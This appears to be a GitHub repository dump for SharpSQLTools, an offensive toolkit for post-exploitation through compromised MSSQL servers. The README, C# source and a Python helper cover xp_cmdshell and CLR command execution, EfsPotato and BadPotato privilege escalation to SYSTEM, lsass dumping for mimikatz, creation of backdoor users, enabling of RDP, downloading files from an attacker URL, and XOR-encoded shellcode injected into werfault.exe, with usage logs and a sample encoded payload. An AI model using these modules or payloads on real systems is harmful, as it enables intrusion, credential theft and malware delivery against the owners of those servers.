├── SharpSQLTools ├── App.config ├── SharpSQLTools.csproj.user ├── Properties │ └── AssemblyInfo.cs ├── Batch.cs ├── SharpSQLTools.csproj └── Program.cs ├── Python └── Encrypt.py ├── SharpSQLTools.sln ├── .github └── workflows │ └── dotnet.yml └── README.md /SharpSQLTools/App.config: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | 6 | 7 | -------------------------------------------------------------------------------- /SharpSQLTools/SharpSQLTools.csproj.user: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 192.168.0.104 sa 1qaz%40WSX 5 | 6 | -------------------------------------------------------------------------------- /Python/Encrypt.py: -------------------------------------------------------------------------------- 1 | #coding:utf-8 2 | #Author:Evi1oX 3 | 4 | import sys 5 | import base64 6 | import argparse 7 | 8 | 9 | def xor(data, key): 10 | l = len(key) 11 | keyAsInt = list(map(ord, key)) 12 | return bytes(bytearray(( 13 | (data[i] ^ keyAsInt[i % l]) for i in range(0,len(data)) 14 | ))) 15 | 16 | if __name__ == '__main__': 17 | parser = argparse.ArgumentParser(description="python3 {0} -f payload.bin -k Evi1oX".format(sys.argv[0])) 18 | parser.add_argument("-f","--file", help="Raw Shellcode File",required=True) 19 | parser.add_argument("-k","--key", help="XOR Encrypted key",required=True) 20 | args = parser.parse_args() 21 | 22 | try: 23 | with open(args.file, 'rb') as f: 24 | scBytes = f.read() 25 | xorBytes = xor(scBytes, args.key) 26 | print("XorKey: "+args.key) 27 | print("Result: "+base64.b64encode(xorBytes).decode()) 28 | with open("payload.txt","w") as f: 29 | f.write(base64.b64encode(xorBytes).decode()) 30 | except Exception as e: 31 | print(e) 32 | sys.exit() -------------------------------------------------------------------------------- /SharpSQLTools/Properties/AssemblyInfo.cs: -------------------------------------------------------------------------------- 1 | using System.Reflection; 2 | using System.Runtime.CompilerServices; 3 | using System.Runtime.InteropServices; 4 | 5 | // 有关程序集的一般信息由以下 6 | // 控制。更改这些特性值可修改 7 | // 与程序集关联的信息。 8 | [assembly: AssemblyTitle("SharpSQLTools")] 9 | [assembly: AssemblyDescription("")] 10 | [assembly: AssemblyConfiguration("")] 11 | [assembly: AssemblyCompany("")] 12 | [assembly: AssemblyProduct("SharpSQLTools")] 13 | [assembly: AssemblyCopyright("Copyright © 2021")] 14 | [assembly: AssemblyTrademark("")] 15 | [assembly: AssemblyCulture("")] 16 | 17 | //将 ComVisible 设置为 false 将使此程序集中的类型 18 | //对 COM 组件不可见。如果需要从 COM 访问此程序集中的类型， 19 | //请将此类型的 ComVisible 特性设置为 true。 20 | [assembly: ComVisible(false)] 21 | 22 | // 如果此项目向 COM 公开，则下列 GUID 用于类型库的 ID 23 | [assembly: Guid("3d20b0bd-086e-4ccf-a956-39a139139fd3")] 24 | 25 | // 程序集的版本信息由下列四个值组成: 26 | // 27 | // 主版本 28 | // 次版本 29 | // 生成号 30 | // 修订号 31 | // 32 | //可以指定所有这些值，也可以使用“生成号”和“修订号”的默认值， 33 | // 方法是按如下所示使用“*”: : 34 | // [assembly: AssemblyVersion("1.0.*")] 35 | [assembly: AssemblyVersion("1.0.0.0")] 36 | [assembly: AssemblyFileVersion("1.0.0.0")] 37 | -------------------------------------------------------------------------------- /SharpSQLTools.sln: -------------------------------------------------------------------------------- 1 | 2 | Microsoft Visual Studio Solution File, Format Version 12.00 3 | # Visual Studio 14 4 | VisualStudioVersion = 14.0.25123.0 5 | MinimumVisualStudioVersion = 10.0.40219.1 6 | Project("{FAE04EC0-301F-11D3-BF4B-00C04F79EFBC}") = "SharpSQLTools", "SharpSQLTools\SharpSQLTools.csproj", "{3D20B0BD-086E-4CCF-A956-39A139139FD3}" 7 | EndProject 8 | Global 9 | GlobalSection(SolutionConfigurationPlatforms) = preSolution 10 | Debug|Any CPU = Debug|Any CPU 11 | Debug|x64 = Debug|x64 12 | Release|Any CPU = Release|Any CPU 13 | Release|x64 = Release|x64 14 | EndGlobalSection 15 | GlobalSection(ProjectConfigurationPlatforms) = postSolution 16 | {3D20B0BD-086E-4CCF-A956-39A139139FD3}.Debug|Any CPU.ActiveCfg = Debug|Any CPU 17 | {3D20B0BD-086E-4CCF-A956-39A139139FD3}.Debug|Any CPU.Build.0 = Debug|Any CPU 18 | {3D20B0BD-086E-4CCF-A956-39A139139FD3}.Debug|x64.ActiveCfg = Debug|Any CPU 19 | {3D20B0BD-086E-4CCF-A956-39A139139FD3}.Debug|x64.Build.0 = Debug|Any CPU 20 | {3D20B0BD-086E-4CCF-A956-39A139139FD3}.Release|Any CPU.ActiveCfg = Release|Any CPU 21 | {3D20B0BD-086E-4CCF-A956-39A139139FD3}.Release|Any CPU.Build.0 = Release|Any CPU 22 | {3D20B0BD-086E-4CCF-A956-39A139139FD3}.Release|x64.ActiveCfg = Release|Any CPU 23 | {3D20B0BD-086E-4CCF-A956-39A139139FD3}.Release|x64.Build.0 = Release|Any CPU 24 | EndGlobalSection 25 | GlobalSection(SolutionProperties) = preSolution 26 | HideSolutionNode = FALSE 27 | EndGlobalSection 28 | EndGlobal 29 | -------------------------------------------------------------------------------- /.github/workflows/dotnet.yml: -------------------------------------------------------------------------------- 1 | name: "Build SharpSQLTools " 2 | 3 | on: 4 | push: 5 | branches: 6 | - master 7 | - releases/* 8 | 9 | jobs: 10 | build: 11 | runs-on: windows-2019 12 | steps: 13 | - name: checkout 14 | uses: actions/checkout@v1 15 | - name: Build DotNET40 16 | run: | 17 | cd "C:\Program Files (x86)\Microsoft Visual Studio\2019\Enterprise\MSBuild\Current\Bin\" 18 | .\MSBuild.exe -p:Configuration=Release $Env:GITHUB_WORKSPACE\ 19 | - name: Upload a Build Artifact 20 | uses: actions/upload-artifact@v2.2.2 21 | with: 22 | # Artifact name 23 | name: SharpSQLTools.exe 24 | path: D:\a\SharpSQLTools\SharpSQLTools\SharpSQLTools\bin\Release\SharpSQLTools.exe 25 | - name: zip_exe 26 | shell: powershell 27 | run: Compress-Archive -Path D:\a\SharpSQLTools\SharpSQLTools\SharpSQLTools\bin\Release\SharpSQLTools.exe -DestinationPath D:\a\SharpSQLTools\SharpSQLTools\SharpSQLTools\bin\Release\SharpSQLTools.zip 28 | - name: Create Release 29 | id: create_release 30 | uses: actions/create-release@v1 31 | env: 32 | GITHUB_TOKEN: ${{ secrets.TOKEN }} 33 | with: 34 | tag_name: ${{ github.run_number }} 35 | release_name: Release ${{ github.run_number }} 36 | draft: false 37 | - name: Upload Release Asset 38 | id: upload-release-asset 39 | uses: actions/upload-release-asset@v1 40 | env: 41 | GITHUB_TOKEN: ${{ secrets.TOKEN }} 42 | with: 43 | upload_url: ${{ steps.create_release.outputs.upload_url }} # This pulls from the CREATE RELEASE step above, referencing it's ID to get its outputs object, which include a `upload_url`. See this blog post for more info: https://jasonet.co/posts/new-features-of-github-actions/#passing-data-to-future-steps 44 | asset_path: D:\a\SharpSQLTools\SharpSQLTools\SharpSQLTools\bin\Release\SharpSQLTools.zip 45 | asset_name: SharpSQLTools.zip 46 | asset_content_type: application/zip 47 | -------------------------------------------------------------------------------- /SharpSQLTools/Batch.cs: -------------------------------------------------------------------------------- 1 | using System; 2 | using System.Collections.Generic; 3 | using System.Data; 4 | using System.Data.SqlClient; 5 | using System.IO; 6 | using System.Linq; 7 | using System.Text; 8 | 9 | namespace SharpSQLTools 10 | { 11 | class Batch 12 | { 13 | public static string RemoteExec(SqlConnection Conn, String Command, Boolean Flag) 14 | { 15 | String value = String.Empty; 16 | try 17 | { 18 | //TODO:发送Command命令 19 | SqlCommand cmd = new SqlCommand(); 20 | cmd.Connection = Conn; 21 | 22 | //查询数据记录 23 | cmd.CommandText = Command; 24 | cmd.CommandType = CommandType.Text; 25 | using (SqlDataReader reader = cmd.ExecuteReader()) 26 | { 27 | while (reader.Read()) 28 | { 29 | if (Flag) 30 | { 31 | value += String.Format("\r\n{0}", reader[0].ToString()); 32 | } 33 | else 34 | { 35 | value = reader[0].ToString(); 36 | } 37 | } 38 | } 39 | return value; 40 | } 41 | catch (Exception ex) 42 | { 43 | //Conn.Close(); 44 | Console.WriteLine("[!] Error log: \r\n" + ex.Message); 45 | } 46 | return null; 47 | } 48 | 49 | public static void CLRExec(SqlConnection Conn, String Command) 50 | { 51 | try 52 | { 53 | //TODO:发送Command命令 54 | SqlCommand cmd = new SqlCommand(); 55 | cmd.Connection = Conn; 56 | 57 | //查询数据记录 58 | cmd.CommandText = Command; 59 | cmd.CommandType = CommandType.Text; 60 | cmd.ExecuteNonQuery(); 61 | } 62 | catch (Exception ex) 63 | { 64 | //Conn.Close(); 65 | Console.WriteLine("[!] Error log: \r\n" + ex.Message); 66 | } 67 | } 68 | } 69 | } -------------------------------------------------------------------------------- /SharpSQLTools/SharpSQLTools.csproj: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | Debug 6 | AnyCPU 7 | {3D20B0BD-086E-4CCF-A956-39A139139FD3} 8 | Exe 9 | Properties 10 | SharpSQLTools 11 | SharpSQLTools 12 | v4.0 13 | 512 14 | true 15 | 16 | 17 | 18 | AnyCPU 19 | true 20 | full 21 | false 22 | bin\Debug\ 23 | DEBUG;TRACE 24 | prompt 25 | 4 26 | false 27 | 28 | 29 | AnyCPU 30 | pdbonly 31 | true 32 | bin\Release\ 33 | TRACE 34 | prompt 35 | 4 36 | false 37 | 38 | 39 | SharpSQLTools.Program 40 | 41 | 42 | 43 | 44 | 45 | 46 | 47 | 48 | 49 | 50 | 51 | 52 | 53 | 54 | 55 | 56 | 57 | 58 | 59 | 60 | 61 | 68 | -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- 1 | - 简介 2 | 3 | 和[RcoIl](http://github.com/rcoIl)一起写的小工具，可上传下载文件，xp_cmdshell与sp_oacreate双回显和clr加载程序集执行相应操作。功能参考[mssqlproxy](https://github.com/blackarrowsec/mssqlproxy)，由于目前C#还不知如何获取SQL连接的socket，该项目中的mssqlproxy功能目前尚未实现。另外，Clr不适用于一些与线程进程相关的操作。 4 | 5 | ##### 编译环境为net 4.0 6 | 7 | ### 更新日志 8 | 9 | - 2021-08-05 10 | - 添加clr_badpotato 11 | - 修改原来的clr_potato为clr_efspotato 12 | 13 | - 2021-08-04 14 | - 添加一些clr实现的基本命令：pwd,ls,netstat,ps等等 15 | - 致谢[KevinJClark@csharptoolbox](https://gitlab.com/KevinJClark/csharptoolbox/-/tree/master/WindowsBinaryReplacements) & [rabbittb](https://github.com/rabbittb) 16 | 17 | - 2021-08-03 18 | - 添加clr_efspotato 19 | - 致谢[zcgonvh@EfsPotato](https://github.com/zcgonvh/EfsPotato) & [hl0rey](https://github.com/hl0rey) 20 | 21 | - 2021-07-10 22 | - 修复上传bug 23 | - 修复clr回显bug 24 | - 2021-06-22 25 | - 添加clr执行命令和程序 26 | - 添加clr合并文件功能，方便在cmd被拦截时代替copy /b合并文件 27 | - 修改支持自定义端口 28 | - 2021-05-27 29 | - 支持shellcode远程加载 30 | - 2021-01-19 31 | - 支持xp_cmdshell与sp_oacreate双回显 32 | - 支持clr加载程序集执行 33 | - 支持上传下载文件 34 | - 2019-12-18 35 | - 发布最初命令行版 36 | 37 | ### Usage 38 | 39 | ``` 40 | λ SharpSQLTools.exe 41 | 42 | _____ _ _____ ____ _ _______ _ 43 | / ____| | / ____|/ __ \| | |__ __| | | 44 | | (___ | |__ __ _ _ __ _ __| (___ | | | | | | | ___ ___ | |___ 45 | \___ \| '_ \ / _` | '__| '_ \\___ \| | | | | | |/ _ \ / _ \| / __| 46 | ____) | | | | (_| | | | |_) |___) | |__| | |____| | (_) | (_) | \__ \ 47 | |_____/|_| |_|\__,_|_| | .__/_____/ \___\_\______|_|\___/ \___/|_|___/ 48 | | | 49 | |_| 50 | by Rcoil & Uknow 51 | 52 | Usage: 53 | 54 | SharpSQLTools target:port username password database - interactive console 55 | SharpSQLTools target:port username password database module command - non-interactive console 56 | 57 | Module: 58 | 59 | enable_xp_cmdshell - you know what it means 60 | disable_xp_cmdshell - you know what it means 61 | xp_cmdshell {cmd} - executes cmd using xp_cmdshell 62 | sp_oacreate {cmd} - executes cmd using sp_oacreate 63 | enable_ole - you know what it means 64 | disable_ole - you know what it means 65 | upload {local} {remote} - upload a local file to a remote path (OLE required) 66 | download {remote} {local} - download a remote file to a local path 67 | enable_clr - you know what it means 68 | disable_clr - you know what it means 69 | install_clr - create assembly and procedure 70 | uninstall_clr - drop clr 71 | clr_pwd - print current directory by clr 72 | clr_ls {directory} - list files by clr 73 | clr_cd {directory} - change directory by clr 74 | clr_ps - list process by clr 75 | clr_netstat - netstat by clr 76 | clr_ping {host} - ping by clr 77 | clr_cat {file} - view file contents by clr 78 | clr_rm {file} - delete file by clr 79 | clr_exec {cmd} - for example: clr_exec whoami;clr_exec -p c:\a.exe;clr_exec -p c:\cmd.exe -a /c whoami 80 | clr_efspotato {cmd} - exec by EfsPotato like clr_exec 81 | clr_badpotato {cmd} - exec by BadPotato like clr_exec 82 | clr_combine {remotefile} - When the upload module cannot call CMD to perform copy to merge files 83 | clr_dumplsass {path} - dumplsass by clr 84 | clr_rdp - check RDP port and Enable RDP 85 | clr_getav - get anti-virus software on this machin by clr 86 | clr_adduser {user} {pass} - add user by clr 87 | clr_download {url} {path} - download file from url by clr 88 | clr_scloader {code} {key} - Encrypt Shellcode by Encrypt.py (only supports x64 shellcode.bin) 89 | clr_scloader1 {file} {key} - Encrypt Shellcode by Encrypt.py and Upload Payload.txt 90 | clr_scloader2 {remotefile} - Upload Payload.bin to target before Shellcode Loader 91 | exit - terminates the server process (and this session) 92 | 93 | ``` 94 | 95 | ### 功能介绍 96 | 97 | 支持交互模式与非交互模式，交互模式直接跟目标，用户名和密码即可。非交互模式直接跟模块与命令。 98 | 99 | ``` 100 | SharpSQLTools target:port username password database - interactive console 101 | SharpSQLTools target:port username password database module command - non-interactive console 102 | ``` 103 | 104 | 105 | 106 | #### xp_cmdshell执行命令 107 | 108 | ``` 109 | λ SharpSQLTools.exe 192.168.28.27 sa 1qaz@WSX xp_cmdshell master whoami 110 | [*] Database connection is successful! 111 | 112 | nt authority\system 113 | 114 | ``` 115 | 116 | 117 | 118 | #### sp_oacreate执行命令 119 | 120 | ``` 121 | λ SharpSQLTools.exe 192.168.0.102 sa 1qaz@WSX master sp_oacreate master "whoami" 122 | [*] Database connection is successful! 123 | 124 | nt service\mssqlserver 125 | ``` 126 | 127 | #### clr执行命令 128 | 129 | ``` 130 | λ SharpSQLTools.exe 192.168.247.139 sa 1qaz@WSX master clr_exec whoami 131 | [*] Database connection is successful! 132 | [+] Process: cmd.exe 133 | [+] arguments: /c whoami 134 | [+] RunCommand: cmd.exe /c whoami 135 | 136 | nt service\mssql$sqlexpress 137 | 138 | λ SharpSQLTools.exe 192.168.247.139 sa 1qaz@WSX master clr_exec -p c:\windows/system32\whoami.exe 139 | [*] Database connection is successful! 140 | [+] Process: c:\windows/system32\whoami.exe 141 | [+] arguments: 142 | [+] RunCommand: c:\windows/system32\whoami.exe 143 | 144 | nt service\mssql$sqlexpress 145 | 146 | λ SharpSQLTools.exe 192.168.247.139 sa 1qaz@WSX master clr_exec -p c:\cmd.exe -a /c whoami 147 | [*] Database connection is successful! 148 | [+] Process: c:\cmd.exe 149 | [+] arguments: /c whoami 150 | [+] RunCommand: c:\cmd.exe /c whoami 151 | 152 | nt service\mssql$sqlexpress 153 | 154 | ``` 155 | 156 | #### clr_efspotato or clr_badpotato 157 | 158 | ``` 159 | λ SharpSQLTools.exe 192.168.247.139 sa 1qaz@WSX master clr_efspotato whoami 160 | [*] Database connection is successful! 161 | Exploit for EfsPotato(MS-EFSR EfsRpcOpenFileRaw with SeImpersonatePrivilege local privalege escalation vulnerability). 162 | Part of GMH's fuck Tools, Code By zcgonvh. 163 | 164 | [+] Current user: NT AUTHORITY\NETWORK SERVICE 165 | [+] Get Token: 3352 166 | [+] Command : c:\Windows\System32\cmd.exe /c whoami 167 | [!] process with pid: 2012 created. 168 | ============================== 169 | 170 | 171 | nt authority\system 172 | 173 | λ SharpSQLTools.exe 192.168.247.139 sa 1qaz@WSX master clr_efspotato -p c:\windows/system32\whoami.exe 174 | [*] Database connection is successful! 175 | Exploit for EfsPotato(MS-EFSR EfsRpcOpenFileRaw with SeImpersonatePrivilege local privalege escalation vulnerability). 176 | Part of GMH's fuck Tools, Code By zcgonvh. 177 | 178 | [+] Current user: NT AUTHORITY\NETWORK SERVICE 179 | [+] Get Token: 3084 180 | [+] Command : c:\windows/system32\whoami.exe 181 | [!] process with pid: 164 created. 182 | ============================== 183 | 184 | 185 | nt authority\system 186 | 187 | λ SharpSQLTools.exe 192.168.247.139 sa 1qaz@WSX master clr_efspotato -p c:\cmd.exe -a /c whoami 188 | [*] Database connection is successful! 189 | Exploit for EfsPotato(MS-EFSR EfsRpcOpenFileRaw with SeImpersonatePrivilege local privalege escalation vulnerability). 190 | Part of GMH's fuck Tools, Code By zcgonvh. 191 | 192 | [+] Current user: NT AUTHORITY\NETWORK SERVICE 193 | [+] Get Token: 3124 194 | [+] Command : c:\cmd.exe /c whoami 195 | [!] process with pid: 2080 created. 196 | ============================== 197 | 198 | 199 | nt authority\system 200 | ``` 201 | 202 | #### clr_scloader 203 | ``` 204 | λ python Encrypt.py -f nc.bin -k 1234 205 | XorKey: 1234 206 | Result: zXqw0MHa8zQxMnJlcGJhZWd6AuZUerhmUXq4Zil6uGYRerhGYXo8g3t4fgX4egL0nQ5SSDMeE3Xw+z51MPPR2WNzYny6YBO/cw57NeG5s7wxMjN8tPJHU3kz42S6eitwunITfTDi0GJ5zfp1uga7fDDkfgX4egL0nXPy/TxzMvUJ0kbFfTF/EDl3CuVE6mtwunIXfTDiVXW6PntwunIvfTDicr81uns14XNrdWlsam5wanJtcGh7t90ScmbO0mt1aGh7vyPbZMvOzW59j0VABm4BATQxc2V9uNR7td2SMjQxe7rReI4xNDgv85wxV3JgeLvXeLjDco59RRUzzud/vdtaMjUxMmp1ixuzXzHN5mRhfwL9fAPzfM7ye73zesz0ebvydYvYPOvRzeZ8uPVZJHBqf73TerrNcIiqkUVTzOF5s/d0MzIzfYlRXlAxMjM0MXNjdWF6utZmZWR5APJZOWhzY9bNVPRwFWYyNXm/dxAp9DNcebvVYmFzY3Vhc2N9zvJyZHjN+3m483+98HOJTf0NtcvkegLmec35vz9ziTy2L1PL5InDgZNkco6Xp46pzud7t/UaDzJNOLPP0Uc2j3YhQVtbMmp1uOjM4Q== 207 | 208 | λ SharpSQLTools.exe 192.168.0.107 sa 1qaz@WSX master clr_scloader zXqw0MHa8zQxMnJlcGJhZWd6AuZUerhmUXq4Zil6uGYRerhGYXo8g3t4fgX4egL0nQ5SSDMeE3Xw+z51MPPR2WNzYny6YBO/cw57NeG5s7wxMjN8tPJHU3kz42S6eitwunITfTDi0GJ5zfp1uga7fDDkfgX4egL0nXPy/TxzMvUJ0kbFfT F/EDl3CuVE6mtwunIXfTDiVXW6PntwunIvfTDicr81uns14XNrdWlsam5wanJtcGh7t90ScmbO0mt1aGh7vyPbZMvOzW59j0VABm4BATQxc2V9uNR7td2SMjQxe7rReI4xNDgv85wxV3JgeLvXeLjDco59RRUzzud/vdtaMjUxMmp1ixuzXzHN5mRhfwL9fAPzfM7ye73zesz0ebvydYvYPOvRzeZ8uPVZJHBqf73TerrNcIiqkUVTzOF5s/d0MzIzfYlRXlAxMjM0MXNjdWF6utZmZWR5APJZOWhzY9bNVPRwFWYyNXm/dxAp9DNcebvVYmFzY3Vhc2N9zvJyZHjN+3m483+98HOJTf0NtcvkegLmec35vz9ziTy2L1PL5InDgZNkco6Xp46pzud7t/UaDzJNOLPP0Uc2j3YhQVtbMmp1uOjM4Q== 1234 209 | [*] Database connection is successful! 210 | [+] EncryptShellcode: zXqw0MHa8zQxMnJlcGJhZWd6AuZUerhmUXq4Zil6uGYRerhGYXo8g3t4fgX4egL0nQ5SSDMeE3Xw+z51MPPR2WNzYny6YBO/cw57NeG5s7wxMjN8tPJHU3kz42S6eitwunITfTDi0GJ5zfp1uga7fDDkfgX4egL0nXPy/TxzMvUJ0kbFfTF/EDl3CuVE6mtwunIXfTDiVXW6PntwunIvfTDicr81uns14XNrdWlsam5wanJtcGh7t90ScmbO0mt1aGh7vyPbZMvOzW59j0VABm4BATQxc2V9uNR7td2SMjQxe7rReI4xNDgv85wxV3JgeLvXeLjDco59RRUzzud/vdtaMjUxMmp1ixuzXzHN5mRhfwL9fAPzfM7ye73zesz0ebvydYvYPOvRzeZ8uPVZJHBqf73TerrNcIiqkUVTzOF5s/d0MzIzfYlRXlAxMjM0MXNjdWF6utZmZWR5APJZOWhzY9bNVPRwFWYyNXm/dxAp9DNcebvVYmFzY3Vhc2N9zvJyZHjN+3m483+98HOJTf0NtcvkegLmec35vz9ziTy2L1PL5InDgZNkco6Xp46pzud7t/UaDzJNOLPP0Uc2j3YhQVtbMmp1uOjM4Q== 211 | [+] XorKey: 1234 212 | [+] StartProcess werfault.exe 213 | [+] OpenProcess Pid: 2508 214 | [+] VirtualAllocEx Success 215 | [+] QueueUserAPC Inject shellcode to PID: 2508 Success 216 | [+] hOpenProcessClose Success 217 | 218 | 219 | [*] QueueUserAPC Inject shellcode Success, enjoy! 220 | ``` 221 | 222 | #### clr_scloader1 223 | ``` 224 | λ SharpSQLTools.exe 192.168.247.139 sa 1qaz@WSX master clr_scloader1 C:\Users\Public\payload.txt aaaa 225 | [*] Database connection is successful! 226 | [+] EncryptShellcodePath: C:\Users\Public\payload.txt 227 | [+] XorKey: aaaa 228 | [+] StartProcess werfault.exe 229 | [+] OpenProcess Pid: 3232 230 | [+] VirtualAllocEx Success 231 | [+] QueueUserAPC Inject shellcode to PID: 3232 Success 232 | [+] hOpenProcessClose Success 233 | 234 | 235 | [*] QueueUserAPC Inject shellcode Success, enjoy! 236 | ``` 237 | 238 | #### clr_scloader2 239 | ``` 240 | λ SharpSQLTools.exe 192.168.247.139 sa 1qaz@WSX master clr_scloader2 C:\Users\Public\beacon.bin 241 | [*] Database connection is successful! 242 | [+] ShellcodePath: C:\Users\Public\beacon.bin 243 | [+] StartProcess werfault.exe 244 | [+] OpenProcess Pid: 332 245 | [+] VirtualAllocEx Success 246 | [+] QueueUserAPC Inject shellcode to PID: 332 Success 247 | [+] hOpenProcessClose Success 248 | 249 | 250 | [*] QueueUserAPC Inject shellcode Success, enjoy! 251 | ``` 252 | 253 | #### clr_dumplsass 254 | 255 | ``` 256 | λ SharpSQLTools.exe 192.168.28.27 sa 1qaz@WSX master clr_dumplsass 257 | [*] Database connection is successful! 258 | 259 | [*] Dumping lsass (488) to C:\Windows\Temp\debug488.out 260 | [+] Dump successful! 261 | 262 | [*] Compressing C:\Windows\Temp\debug488.out to C:\Windows\Temp\debug488.bin gzip file 263 | [X] Output file 'C:\Windows\Temp\debug488.bin' already exists, removing 264 | [*] Deleting C:\Windows\Temp\debug488.out 265 | 266 | [+] Dumping completed. Rename file to "debug488.gz" to decompress. 267 | 268 | [*] Operating System : Windows Server 2008 R2 Standard 269 | [*] Architecture : AMD64 270 | [*] Use "sekurlsa::minidump debug.out" "sekurlsa::logonPasswords full" on the same OS/arch 271 | ``` 272 | 273 | ### clr_RDP 274 | 275 | ``` 276 | λ SharpSQLTools.exe 192.168.0.103 sa 1qaz@WSX master "clr_RDP" 277 | [*] Database connection is successful! 278 | [*] RDP is already enabled 279 | [+] RDP Port: 3389 280 | ``` 281 | 282 | ### clr_getav 283 | 284 | ``` 285 | λ SharpSQLTools.exe 192.168.0.103 sa 1qaz@WSX master "clr_getav" 286 | [*] Database connection is successful! 287 | [*] Finding.... 288 | [>] proName: wdswfsafe appName: 360杀毒-网盾 289 | [*] Finish! 290 | ``` 291 | 292 | #### clr_adduser 293 | 294 | ``` 295 | λ SharpSQLTools.exe 192.168.28.27 sa 1qaz@WSX master clr_adduser test1234 1qaz@WSX 296 | [*] Database connection is successful! 297 | [*] Adding User success 298 | [*] Adding Group Member success 299 | ``` 300 | 301 | #### clr_combine 302 | ``` 303 | λ SharpSQLTools.exe 192.168.247.139 sa 1qaz@WSX master clr_combine C:\Users\Public\payload.txt 304 | [*] Database connection is successful! 305 | [+] remoteFile: C:\Users\Public\payload.txt 306 | [+] count: 5 307 | [+] combinefile: C:\Users\Public\payload.txt_*.config_txt C:\Users\Public\payload.txt 308 | [*] 'C:\Users\Public\payload.txt_*.config_txt' CombineFile completed 309 | ``` 310 | 311 | #### clr_download 312 | 313 | ``` 314 | λ SharpSQLTools.exe 192.168.28.27 sa 1qaz@WSX master clr_download "http://192.168.28.185:8001/clac.bin" "c:\Users\Public\Downloads\test.bin" 315 | [*] Database connection is successful! 316 | [*] Download success 317 | ``` 318 | 319 | 320 | #### upload 321 | 322 | ``` 323 | λ SharpSQLTools.exe 192.168.28.27 sa 1qaz@WSX master upload C:\Users\Pentest\Desktop\test\usc.exe c:\Users\Public\Downloads\11.exe 324 | [*] Database connection is successful! 325 | [*] Uploading 'C:\Users\Pentest\Desktop\test\usc.exe' to 'c:\Users\Public\Downloads\11.exe'... 326 | [+] 7-1 Upload completed 327 | [+] 7-2 Upload completed 328 | [+] 7-3 Upload completed 329 | [+] 7-4 Upload completed 330 | [+] 7-5 Upload completed 331 | [+] 7-6 Upload completed 332 | [+] 7-7 Upload completed 333 | [+] copy /b c:\Users\Public\Downloads\11.exe_x.config_txt c:\Users\Public\Downloads\11.exe 334 | [+] del c:\Users\Public\Downloads\*.config_txt 335 | [*] 'C:\Users\Pentest\Desktop\test\usc.exe' Upload completed 336 | ``` 337 | 338 | 339 | 340 | #### download 341 | 342 | ``` 343 | λ SharpSQLTools.exe 192.168.28.27 sa 1qaz@WSX master download c:\Users\Public\Downloads\t.txt C:\Users\Pentest\Desktop\test\t.txt 344 | [*] Database connection is successful! 345 | [*] Downloading 'c:\Users\Public\Downloads\t.txt' to 'C:\Users\Pentest\Desktop\test\t.txt'... 346 | [*] 'c:\Users\Public\Downloads\t.txt' Download completed 347 | ``` 348 | 349 | 350 | 351 | ### References 352 | 353 | https://github.com/blackarrowsec/mssqlproxy 354 | 355 | https://github.com/An0nySec/ShadowUser/blob/main/ShadowUser/Program.cs#L235 356 | 357 | https://github.com/GhostPack/SharpDump 358 | 359 | https://gist.github.com/jfmaes/944991c40fb34625cf72fd33df1682c0 360 | 361 | https://github.com/zcgonvh/EfsPotato 362 | 363 | https://gitlab.com/KevinJClark/csharptoolbox -------------------------------------------------------------------------------- /SharpSQLTools/Program.cs: -------------------------------------------------------------------------------- 1 | using System; 2 | using System.Collections; 3 | using System.Collections.Generic; 4 | using System.Data; 5 | using System.Data.SqlClient; 6 | using System.IO; 7 | using System.Linq; 8 | using System.Threading; 9 | 10 | namespace SharpSQLTools 11 | { 12 | class Program 13 | { 14 | static SqlConnection Conn; 15 | static Setting setting; 16 | static String sqlstr; 17 | 18 | private static void Help() 19 | { 20 | Console.WriteLine(@" 21 | enable_xp_cmdshell - you know what it means 22 | disable_xp_cmdshell - you know what it means 23 | xp_cmdshell {cmd} - executes cmd using xp_cmdshell 24 | sp_oacreate {cmd} - executes cmd using sp_oacreate 25 | enable_ole - you know what it means 26 | disable_ole - you know what it means 27 | upload {local} {remote} - upload a local file to a remote path (OLE required) 28 | download {remote} {local} - download a remote file to a local path 29 | enable_clr - you know what it means 30 | disable_clr - you know what it means 31 | install_clr - create assembly and procedure 32 | uninstall_clr - drop clr 33 | clr_pwd - print current directory by clr 34 | clr_ls {directory} - list files by clr 35 | clr_cd {directory} - change directory by clr 36 | clr_ps - list process by clr 37 | clr_netstat - netstat by clr 38 | clr_ping {host} - ping by clr 39 | clr_cat {file} - view file contents by clr 40 | clr_rm {file} - delete file by clr 41 | clr_exec {cmd} - for example: clr_exec whoami;clr_exec -p c:\a.exe;clr_exec -p c:\cmd.exe -a /c whoami 42 | clr_efspotato {cmd} - exec by EfsPotato like clr_exec 43 | clr_badpotato {cmd} - exec by BadPotato like clr_exec 44 | clr_combine {remotefile} - When the upload module cannot call CMD to perform copy to merge files 45 | clr_dumplsass {path} - dumplsass by clr 46 | clr_rdp - check RDP port and Enable RDP 47 | clr_getav - get anti-virus software on this machin by clr 48 | clr_adduser {user} {pass} - add user by clr 49 | clr_download {url} {path} - download file from url by clr 50 | clr_scloader {code} {key} - Encrypt Shellcode by Encrypt.py (only supports x64 shellcode.bin) 51 | clr_scloader1 {file} {key} - Encrypt Shellcode by Encrypt.py and Upload Payload.txt 52 | clr_scloader2 {remotefile} - Upload Payload.bin to target before Shellcode Loader 53 | exit - terminates the server process (and this session)" 54 | ); 55 | } 56 | private static void logo() 57 | { 58 | Console.WriteLine(@" 59 | _____ _ _____ ____ _ _______ _ 60 | / ____| | / ____|/ __ \| | |__ __| | | 61 | | (___ | |__ __ _ _ __ _ __| (___ | | | | | | | ___ ___ | |___ 62 | \___ \| '_ \ / _` | '__| '_ \\___ \| | | | | | |/ _ \ / _ \| / __| 63 | ____) | | | | (_| | | | |_) |___) | |__| | |____| | (_) | (_) | \__ \ 64 | |_____/|_| |_|\__,_|_| | .__/_____/ \___\_\______|_|\___/ \___/|_|___/ 65 | | | 66 | |_| 67 | by Rcoil & Uknow 68 | "); 69 | } 70 | 71 | ///

72 | /// xp_cmdshell 执行命令 73 | ///

74 | /// 命令 75 | static void xp_shell(String Command) 76 | { 77 | if (setting.Check_configuration("xp_cmdshell", 0) && !setting.Enable_xp_cmdshell()) 78 | { 79 | return; 80 | } 81 | sqlstr = String.Format("exec master..xp_cmdshell '{0}'", Command); 82 | Console.WriteLine(Batch.RemoteExec(Conn, sqlstr, true)); 83 | } 84 | 85 | ///

86 | /// 获取当前时间戳 87 | ///

